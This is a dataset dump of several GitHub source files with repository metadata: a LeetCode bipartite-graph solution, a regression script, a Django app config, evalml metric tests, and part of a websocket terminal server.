hexsha
stringlengths
40
40
size
int64
5
2.06M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
248
max_stars_repo_name
stringlengths
5
125
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
sequencelengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
248
max_issues_repo_name
stringlengths
5
125
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
sequencelengths
1
10
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
248
max_forks_repo_name
stringlengths
5
125
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
sequencelengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
5
2.06M
avg_line_length
float64
1
1.02M
max_line_length
int64
3
1.03M
alphanum_fraction
float64
0
1
count_classes
int64
0
1.6M
score_classes
float64
0
1
count_generators
int64
0
651k
score_generators
float64
0
1
count_decorators
int64
0
990k
score_decorators
float64
0
1
count_async_functions
int64
0
235k
score_async_functions
float64
0
1
count_documentation
int64
0
1.04M
score_documentation
float64
0
1
bea43752768259680c29953a0cec72ec71c5a8eb
1,329
py
Python
code_week12_713_719/is_graph_bipartite_hard.py
dylanlee101/leetcode
b059afdadb83d504e62afd1227107de0b59557af
[ "Apache-2.0" ]
null
null
null
code_week12_713_719/is_graph_bipartite_hard.py
dylanlee101/leetcode
b059afdadb83d504e62afd1227107de0b59557af
[ "Apache-2.0" ]
null
null
null
code_week12_713_719/is_graph_bipartite_hard.py
dylanlee101/leetcode
b059afdadb83d504e62afd1227107de0b59557af
[ "Apache-2.0" ]
null
null
null
''' 给定一个无向图graph,当这个图为二分图时返回true。 如果我们能将一个图的节点集合分割成两个独立的子集A和B,并使图中的每一条边的两个节点一个来自A集合,一个来自B集合,我们就将这个图称为二分图。 graph将会以邻接表方式给出,graph[i]表示图中与节点i相连的所有节点。每个节点都是一个在0到graph.length-1之间的整数。这图中没有自环和平行边: graph[i] 中不存在i,并且graph[i]中没有重复的值。 示例 1: 输入: [[1,3], [0,2], [1,3], [0,2]] 输出: true 解释: 无向图如下: 0----1 | | | | 3----2 我们可以将节点分成两组: {0, 2} 和 {1, 3}。 示例 2: 输入: [[1,2,3], [0,2], [0,1,3], [0,2]] 输出: false 解释: 无向图如下: 0----1 | \ | | \ | 3----2 我们不能将节点分割成两个独立的子集。 来源:力扣(LeetCode) 链接:https://leetcode-cn.com/problems/is-graph-bipartite ''' class Solution: def isBipartite(self, graph: List[List[int]]) -> bool: n = len(graph) uncolored, red, green = 0, 1, 2 color = [uncolored] * n valid = True def dfs(node, c): nonlocal valid color[node] = c cNei = (green if c == red else red) for neighbor in graph[node]: if color[neighbor] == uncolored: dfs(neighbor, cNei) if not valid: return elif color[neighbor] != cNei: valid = False return for i in range(n): if color[i] == uncolored: dfs(i, red) if not valid: break return valid
21.435484
117
0.51392
793
0.446258
0
0
0
0
0
0
980
0.551491
bea493d4dc7e2d4506520e5f797ce4cb0a9a2a6e
1,417
py
Python
data_preprocessing/decision_tree_regression.py
Frost199/Machine_Learning
8cf77c6cbbae7781ac6f2ffcc9218ad79472d287
[ "MIT" ]
null
null
null
data_preprocessing/decision_tree_regression.py
Frost199/Machine_Learning
8cf77c6cbbae7781ac6f2ffcc9218ad79472d287
[ "MIT" ]
null
null
null
data_preprocessing/decision_tree_regression.py
Frost199/Machine_Learning
8cf77c6cbbae7781ac6f2ffcc9218ad79472d287
[ "MIT" ]
1
2020-05-23T16:46:52.000Z
2020-05-23T16:46:52.000Z
# -*- coding: utf-8 -*- """ Created on Tue Apr 17 06:44:47 2018 @author: Eleam Emmanuel """ import pandas as pd import numpy as np import matplotlib.pyplot as plt from sklearn.tree import DecisionTreeRegressor # importing the dataset dataset = pd.read_csv('Position_Salaries.csv') # take all the columns but leave the last one(-1) # always make sure our independent variable is a matrix not a vector and # dependent variable can be a vector X = dataset.iloc[:, 1:-1].values Y = dataset.iloc[:, 2].values # splitting the dataset into a training set and a test set # x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0) # feature scaling """sc_X = StandardScaler() x_train = sc_X.fit_transform(x_train) x_test = sc_X.transform(x_test) sc_Y = StandardScaler() x_train = sc_X.fit_transform(x_train)""" # fitting the Decision Tree regression Model to the dataset regressor = DecisionTreeRegressor(random_state=0) regressor.fit(X, Y) # predicting a new result y_pred = regressor.predict(6.5) # Visualizing the Decision tree regression result (for higher resolution and smoother curve) X_grid = np.arange(min(X), max(X), 0.01) X_grid = X_grid.reshape(len(X_grid), 1) plt.scatter(X, Y, color='red') plt.plot(X_grid, regressor.predict(X_grid), color='blue') plt.title("Truth or Bluff (Regression Model)") plt.xlabel("Position Level") plt.ylabel("Salary") plt.show()
30.804348
92
0.740296
0
0
0
0
0
0
0
0
867
0.611856
bea4e663116d7a61eb7a7e77d69904ecfbbff62c
1,786
py
Python
user_messages/apps.py
everaccountable/django-user-messages
101d539b785bdb440bf166fb16ad25eb66e4174a
[ "MIT" ]
null
null
null
user_messages/apps.py
everaccountable/django-user-messages
101d539b785bdb440bf166fb16ad25eb66e4174a
[ "MIT" ]
null
null
null
user_messages/apps.py
everaccountable/django-user-messages
101d539b785bdb440bf166fb16ad25eb66e4174a
[ "MIT" ]
null
null
null
from django.apps import AppConfig from django.conf import settings from django.core import checks from django.template import engines from django.template.backends.django import DjangoTemplates from django.utils.text import capfirst from django.utils.translation import gettext_lazy as _ @checks.register() def check_context_processors(app_configs, **kwargs): errors = [] for engine in engines.all(): if isinstance(engine, DjangoTemplates): django_templates_instance = engine.engine break else: django_templates_instance = None if django_templates_instance: if ( "django.contrib.messages.context_processors.messages" not in django_templates_instance.context_processors and "admin.E404" not in settings.SILENCED_SYSTEM_CHECKS ): errors.append( checks.Error( "If using 'user_messages.context_processors.messages'" " instead of the official messages context processor" " you have to add 'admin.E404' to SILENCED_SYSTEM_CHECKS.", id="user_messages.E001", ) ) if ("admin.E406" not in settings.SILENCED_SYSTEM_CHECKS and "django.contrib.messages" not in settings.INSTALLED_APPS): errors.append( checks.Error( "If using 'user_messages' instead of django.contrib.messages" " you have to add 'admin.E406' to SILENCED_SYSTEM_CHECKS.", id="user_messages.E002", ) ) return errors class UserMessagesConfig(AppConfig): default_auto_field = "django.db.models.AutoField" name = "user_messages" verbose_name = capfirst(_("user messages"))
33.698113
79
0.647816
165
0.092385
0
0
1,327
0.743001
0
0
484
0.270997
bea518b5d7670e7d0f948f9ce8eda34d0fa0bd36
20,671
py
Python
evalml/tests/objective_tests/test_standard_metrics.py
sharshofski/evalml
f13dcd969e86b72ba01ca520247a16850030dcb0
[ "BSD-3-Clause" ]
null
null
null
evalml/tests/objective_tests/test_standard_metrics.py
sharshofski/evalml
f13dcd969e86b72ba01ca520247a16850030dcb0
[ "BSD-3-Clause" ]
null
null
null
evalml/tests/objective_tests/test_standard_metrics.py
sharshofski/evalml
f13dcd969e86b72ba01ca520247a16850030dcb0
[ "BSD-3-Clause" ]
null
null
null
from itertools import product import numpy as np import pandas as pd import pytest from sklearn.metrics import matthews_corrcoef as sk_matthews_corrcoef from evalml.objectives import ( F1, MAPE, MSE, AccuracyBinary, AccuracyMulticlass, BalancedAccuracyBinary, BalancedAccuracyMulticlass, BinaryClassificationObjective, CostBenefitMatrix, ExpVariance, F1Macro, F1Micro, F1Weighted, LogLossBinary, MCCBinary, MCCMulticlass, MeanSquaredLogError, Precision, PrecisionMacro, PrecisionMicro, PrecisionWeighted, Recall, RecallMacro, RecallMicro, RecallWeighted, RootMeanSquaredError, RootMeanSquaredLogError ) from evalml.objectives.utils import ( _all_objectives_dict, get_non_core_objectives ) EPS = 1e-5 all_automl_objectives = _all_objectives_dict() all_automl_objectives = {name: class_() for name, class_ in all_automl_objectives.items() if class_ not in get_non_core_objectives()} def test_input_contains_nan(): y_predicted = np.array([np.nan, 0, 0]) y_true = np.array([1, 2, 1]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"): objective.score(y_true, y_predicted) y_true = np.array([np.nan, 0, 0]) y_predicted = np.array([1, 2, 0]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="y_true contains NaN or infinity"): objective.score(y_true, y_predicted) y_true = np.array([1, 0]) y_predicted_proba = np.array([[1, np.nan], [0.1, 0]]) for objective in all_automl_objectives.values(): if objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"): objective.score(y_true, y_predicted_proba) def test_input_contains_inf(): y_predicted = np.array([np.inf, 0, 0]) y_true = np.array([1, 0, 0]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"): objective.score(y_true, y_predicted) y_true = np.array([np.inf, 0, 0]) y_predicted = np.array([1, 0, 0]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="y_true contains NaN or infinity"): objective.score(y_true, y_predicted) y_true = np.array([1, 0]) y_predicted_proba = np.array([[1, np.inf], [0.1, 0]]) for objective in all_automl_objectives.values(): if objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains NaN or infinity"): objective.score(y_true, y_predicted_proba) def test_different_input_lengths(): y_predicted = np.array([0, 0]) y_true = np.array([1]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="Inputs have mismatched dimensions"): objective.score(y_true, y_predicted) y_true = np.array([0, 0]) y_predicted = np.array([1, 2, 0]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="Inputs have mismatched dimensions"): objective.score(y_true, y_predicted) def test_zero_input_lengths(): y_predicted = np.array([]) y_true = np.array([]) for objective in all_automl_objectives.values(): with pytest.raises(ValueError, match="Length of inputs is 0"): objective.score(y_true, y_predicted) def test_probabilities_not_in_0_1_range(): y_predicted = np.array([0.3, 1.001, 0.3]) y_true = np.array([1, 0, 1]) for objective in all_automl_objectives.values(): if objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains probability estimates"): objective.score(y_true, y_predicted) y_predicted = np.array([0.3, -0.001, 0.3]) y_true = np.array([1, 0, 1]) for objective in all_automl_objectives.values(): if objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains probability estimates"): objective.score(y_true, y_predicted) y_true = np.array([1, 0]) y_predicted_proba = np.array([[1, 3], [0.1, 0]]) for objective in all_automl_objectives.values(): if objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains probability estimates"): objective.score(y_true, y_predicted_proba) def test_negative_with_log(): y_predicted = np.array([-1, 10, 30]) y_true = np.array([-1, 0, 1]) for objective in [MeanSquaredLogError(), RootMeanSquaredLogError()]: with pytest.raises(ValueError, match="Mean Squared Logarithmic Error cannot be used when targets contain negative values."): objective.score(y_true, y_predicted) def test_binary_more_than_two_unique_values(): y_predicted = np.array([0, 1, 2]) y_true = np.array([1, 0, 1]) for objective in all_automl_objectives.values(): if isinstance(objective, BinaryClassificationObjective) and not objective.score_needs_proba: with pytest.raises(ValueError, match="y_predicted contains more than two unique values"): objective.score(y_true, y_predicted) y_true = np.array([0, 1, 2]) y_predicted = np.array([1, 0, 1]) for objective in all_automl_objectives.values(): if isinstance(objective, BinaryClassificationObjective) and not objective.score_needs_proba: with pytest.raises(ValueError, match="y_true contains more than two unique values"): objective.score(y_true, y_predicted) def test_accuracy_binary(): obj = AccuracyBinary() assert obj.score(np.array([0, 0, 1, 1]), np.array([1, 1, 0, 0])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0, 1, 1]), np.array([0, 1, 0, 1])) == pytest.approx(0.5, EPS) assert obj.score(np.array([0, 0, 1, 1]), np.array([0, 0, 1, 1])) == pytest.approx(1.0, EPS) def test_accuracy_multi(): obj = AccuracyMulticlass() assert obj.score(np.array([0, 0, 1, 1]), np.array([1, 1, 0, 0])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0, 1, 1]), np.array([0, 1, 0, 1])) == pytest.approx(0.5, EPS) assert obj.score(np.array([0, 0, 1, 1]), np.array([0, 0, 1, 1])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 1, 1, 2, 2]), np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 0, 0, 0]), np.array([0, 0, 1, 1, 2, 2])) == pytest.approx(1 / 3.0, EPS) def test_balanced_accuracy_binary(): obj = BalancedAccuracyBinary() assert obj.score(np.array([0, 1, 0, 0, 1, 0]), np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.625, EPS) assert obj.score(np.array([0, 1, 0, 0, 1, 0]), np.array([0, 1, 0, 0, 1, 0])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 1, 0, 0, 1, 0]), np.array([1, 0, 1, 1, 0, 1])) == pytest.approx(0.0, EPS) def test_balanced_accuracy_multi(): obj = BalancedAccuracyMulticlass() assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]), np.array([0, 0, 2, 0, 0, 2, 3])) == pytest.approx(0.75, EPS) assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]), np.array([0, 1, 2, 0, 1, 2, 3])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 1, 2, 0, 1, 2, 3]), np.array([1, 0, 3, 1, 2, 1, 0])) == pytest.approx(0.0, EPS) def test_f1_binary(): obj = F1() assert obj.score(np.array([0, 1, 0, 0, 1, 0]), np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.5, EPS) assert obj.score(np.array([0, 1, 0, 0, 1, 1]), np.array([0, 1, 0, 0, 1, 1])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 0, 1, 0]), np.array([0, 1, 0, 0, 0, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([0, 0])) == pytest.approx(0.0, EPS) def test_f1_micro_multi(): obj = F1Micro() assert obj.score(np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(0.0, EPS) assert obj.score(np.array([1, 2]), np.array([0, 0])) == pytest.approx(0.0, EPS) def test_f1_macro_multi(): obj = F1Macro() assert obj.score(np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) \ == pytest.approx(2 * (1 / 3.0) * (1 / 9.0) / (1 / 3.0 + 1 / 9.0), EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(0.0, EPS) assert obj.score(np.array([1, 2]), np.array([0, 0])) == pytest.approx(0.0, EPS) def test_f1_weighted_multi(): obj = F1Weighted() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) \ == pytest.approx(2 * (1 / 3.0) * (1 / 9.0) / (1 / 3.0 + 1 / 9.0), EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_precision_binary(): obj = Precision() assert obj.score(np.array([1, 1, 1, 1, 1, 1]), np.array([0, 0, 0, 1, 1, 1])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1]), np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(0.5, EPS) assert obj.score(np.array([0, 0, 0, 0, 0, 0]), np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0, 0, 0, 0, 0]), np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(0.0, EPS) def test_precision_micro_multi(): obj = PrecisionMicro() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_precision_macro_multi(): obj = PrecisionMacro() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 9.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_precision_weighted_multi(): obj = PrecisionWeighted() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 9.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_recall_binary(): obj = Recall() assert obj.score(np.array([0, 0, 0, 1, 1, 1]), np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1]), np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(0.0, EPS) assert obj.score(np.array([1, 1, 1, 1, 1, 1]), np.array([0, 0, 0, 1, 1, 1])) == pytest.approx(0.5, EPS) def test_recall_micro_multi(): obj = RecallMicro() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_recall_macro_multi(): obj = RecallMacro() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_recall_weighted_multi(): obj = RecallWeighted() assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS) assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]), np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS) assert obj.score(np.array([0, 0]), np.array([1, 2])) == pytest.approx(0.0, EPS) def test_log_linear_model(): obj = MeanSquaredLogError() root_obj = RootMeanSquaredLogError() s1_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s1_actual = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]) s2_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s2_actual = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s3_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s3_actual = np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]) assert obj.score(s1_predicted, s1_actual) == pytest.approx(0.562467324910) assert obj.score(s2_predicted, s2_actual) == pytest.approx(0) assert obj.score(s3_predicted, s3_actual) == pytest.approx(0.617267976207983) assert root_obj.score(s1_predicted, s1_actual) == pytest.approx(np.sqrt(0.562467324910)) assert root_obj.score(s2_predicted, s2_actual) == pytest.approx(0) assert root_obj.score(s3_predicted, s3_actual) == pytest.approx(np.sqrt(0.617267976207983)) def test_mse_linear_model(): obj = MSE() root_obj = RootMeanSquaredError() s1_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s1_actual = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0]) s2_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s2_actual = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s3_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]) s3_actual = np.array([2, 2, 2, 0, 0, 0, 1, 1, 1]) assert obj.score(s1_predicted, s1_actual) == pytest.approx(5. / 3.) assert obj.score(s2_predicted, s2_actual) == pytest.approx(0) assert obj.score(s3_predicted, s3_actual) == pytest.approx(2.) assert root_obj.score(s1_predicted, s1_actual) == pytest.approx(np.sqrt(5. / 3.)) assert root_obj.score(s2_predicted, s2_actual) == pytest.approx(0) assert root_obj.score(s3_predicted, s3_actual) == pytest.approx(np.sqrt(2.)) def test_mcc_catches_warnings(): y_true = [1, 0, 1, 1] y_predicted = [0, 0, 0, 0] with pytest.warns(RuntimeWarning) as record: sk_matthews_corrcoef(y_true, y_predicted) assert "invalid value" in str(record[-1].message) with pytest.warns(None) as record: MCCBinary().objective_function(y_true, y_predicted) MCCMulticlass().objective_function(y_true, y_predicted) assert len(record) == 0 def test_mape_time_series_model(): obj = MAPE() s1_actual = np.array([0, 0, 1, 1, 1, 1, 2, 0, 2]) s1_predicted = np.array([0, 1, 0, 1, 1, 2, 1, 2, 0]) s2_actual = np.array([-1, -2, 1, 3]) s2_predicted = np.array([1, 2, -1, -3]) s3_actual = np.array([1, 2, 4, 2, 1, 2]) s3_predicted = np.array([0, 2, 2, 1, 3, 2]) with pytest.raises(ValueError, match="Mean Absolute Percentage Error cannot be used when targets contain the value 0."): obj.score(s1_actual, s1_predicted) assert obj.score(s2_actual, s2_predicted) == pytest.approx(8 / 4 * 100) assert obj.score(s3_actual, s3_predicted) == pytest.approx(4 / 6 * 100) assert obj.score(pd.Series(s3_actual, index=range(-12, -6)), s3_predicted) == pytest.approx(4 / 6 * 100) assert obj.score(pd.Series(s2_actual, index=range(10, 14)), pd.Series(s2_predicted, index=range(20, 24))) == pytest.approx(8 / 4 * 100) @pytest.mark.parametrize("objective_class", _all_objectives_dict().values()) def test_calculate_percent_difference(objective_class): score = 5 reference_score = 10 change = ((-1) ** (not objective_class.greater_is_better) * (score - reference_score)) / reference_score answer = 100 * change assert objective_class.calculate_percent_difference(score, reference_score) == answer assert objective_class.perfect_score is not None @pytest.mark.parametrize("objective_class,nan_value", product(_all_objectives_dict().values(), [None, np.nan])) def test_calculate_percent_difference_with_nan(objective_class, nan_value): assert pd.isna(objective_class.calculate_percent_difference(nan_value, 2)) assert pd.isna(objective_class.calculate_percent_difference(-1, nan_value)) assert pd.isna(objective_class.calculate_percent_difference(nan_value, nan_value)) assert pd.isna(objective_class.calculate_percent_difference(2, 0)) def test_calculate_percent_difference_negative_and_equal_numbers(): assert CostBenefitMatrix.calculate_percent_difference(score=5, baseline_score=5) == 0 assert CostBenefitMatrix.calculate_percent_difference(score=-5, baseline_score=-10) == 50 assert CostBenefitMatrix.calculate_percent_difference(score=-10, baseline_score=-5) == -100 assert CostBenefitMatrix.calculate_percent_difference(score=-5, baseline_score=10) == -150 assert CostBenefitMatrix.calculate_percent_difference(score=10, baseline_score=-5) == 300 # These values are not possible for LogLossBinary but we need them for 100% coverage # We might add an objective where lower is better that can take negative values in the future assert LogLossBinary.calculate_percent_difference(score=-5, baseline_score=-10) == -50 assert LogLossBinary.calculate_percent_difference(score=-10, baseline_score=-5) == 100 assert LogLossBinary.calculate_percent_difference(score=-5, baseline_score=10) == 150 assert LogLossBinary.calculate_percent_difference(score=10, baseline_score=-5) == -300 def test_calculate_percent_difference_small(): expected_value = 100 * -1 * np.abs(1e-9 / (1e-9)) assert np.isclose(ExpVariance.calculate_percent_difference(score=0, baseline_score=1e-9), expected_value, atol=1e-8) assert pd.isna(ExpVariance.calculate_percent_difference(score=0, baseline_score=1e-10)) assert pd.isna(ExpVariance.calculate_percent_difference(score=1e-9, baseline_score=0)) assert pd.isna(ExpVariance.calculate_percent_difference(score=0, baseline_score=0))
40.771203
133
0.592473
0
0
0
0
957
0.046297
0
0
940
0.045474
bea66694bcf52b9fffd500768ba31f40d22d16ce
4,908
py
Python
server-python3/server.py
Aaron-Ming/websocket_terminal
42c24391d51c275eabf1f879fb312b9a3614f51e
[ "MIT" ]
40
2016-11-20T09:48:27.000Z
2021-04-02T00:29:14.000Z
server-python3/server.py
Aaron-Ming/websocket_terminal
42c24391d51c275eabf1f879fb312b9a3614f51e
[ "MIT" ]
6
2018-01-07T03:43:22.000Z
2022-03-21T08:43:33.000Z
server-python3/server.py
glensc/websocket_terminal
42c24391d51c275eabf1f879fb312b9a3614f51e
[ "MIT" ]
20
2016-12-02T06:00:27.000Z
2021-08-15T11:40:34.000Z
import os import urllib.parse import eventlet import eventlet.green.socket # eventlet.monkey_patch() import eventlet.websocket import eventlet.wsgi import wspty.pipe from flask import Flask, request, redirect from wspty.EchoTerminal import EchoTerminal from wspty.EncodedTerminal import EncodedTerminal from wspty.WebsocketBinding import WebsocketBinding import config def make_app(): app = Flask(__name__) app.static_folder = get_static_folder() print("Serving static files from: " + app.static_folder) @app.route('/') def index(): newurl = b'/static/index.html' if request.query_string: newurl = newurl + b'?' + request.query_string return redirect(newurl) return app def parse_query(qstr): return {k: v[0] for k, v in urllib.parse.parse_qs(qstr).items()} def debug(s): app.logger.debug(s) class TerminalFactory: def __init__(self, args_dict, allow_unsafe=False): self.kind = args_dict['kind'] self.hostname = args_dict.get('hostname', 'localhost') self.port = int(args_dict.get('port', '22')) self.username = args_dict.get('username') self.password = args_dict.get('password') self.term = args_dict.get('term') self.encoding = args_dict.get('encoding', 'utf8') self.allow_unsafe = allow_unsafe def create_binary(self): if self.kind == 'ssh': from wspty.SshTerminal import SshTerminal return SshTerminal( self.hostname, self.port, self.username, self.password, self.term ) if self.kind == 'raw': from wspty.SocketTerminal import SocketTerminal sock = eventlet.green.socket.socket() ip = eventlet.green.socket.gethostbyname(self.hostname) sock.connect((ip, self.port)) return SocketTerminal(sock) if self.kind == 'echo': return EchoTerminal() if self.kind == 'prompt': if not self.allow_unsafe: raise Exception("kind {} is disabled".format(self.kind)) from wspty import PromptTerminal return PromptTerminal.os_terminal() raise NotImplemented('kind: {}'.format(self.kind)) def create(self): return EncodedTerminal(self.create_binary(), self.encoding) class DefaultRootApp: def __init__(self): self._app_handle_wssh = eventlet.websocket.WebSocketWSGI(self.handle_wssh) self.allow_unsafe = False def handle_wssh(self, ws): debug('Creating terminal with remote {remote}'.format( remote=ws.environ.get('REMOTE_ADDR'), )) ws_binding = WebsocketBinding(ws) query = parse_query(ws.environ.get('QUERY_STRING', '')) terminal = None try: kind, terminal = self.create_terminal(query) ws_binding.send('Connected to %s\r\n' % (kind,)) wspty.pipe.pipe(ws_binding, terminal) except BaseException as e: ws_binding.send_error(e) raise finally: if terminal: terminal.close() debug('Closing terminal normally with remote {remote}'.format( remote=ws.environ.get('REMOTE_ADDR'), )) return '' def create_terminal(self, obj): factory = TerminalFactory(obj, self.allow_unsafe) return factory.kind, factory.create() def handler(self, env, *args): route = env["PATH_INFO"] if route == '/wssh': return self._app_handle_wssh(env, *args) else: return app(env, *args) def make_parser(): import argparse parser = argparse.ArgumentParser(description='Websocket Terminal server') parser.add_argument('-l', '--listen', default='', help='Listen on interface (default all)') parser.add_argument('-p', '--port', default=5002, type=int, help='Listen on port') parser.add_argument('--unsafe', action='store_true', help='Allow unauthenticated connections to local machine') return parser def start(interface, port, root_app_handler): conn = (interface, port) 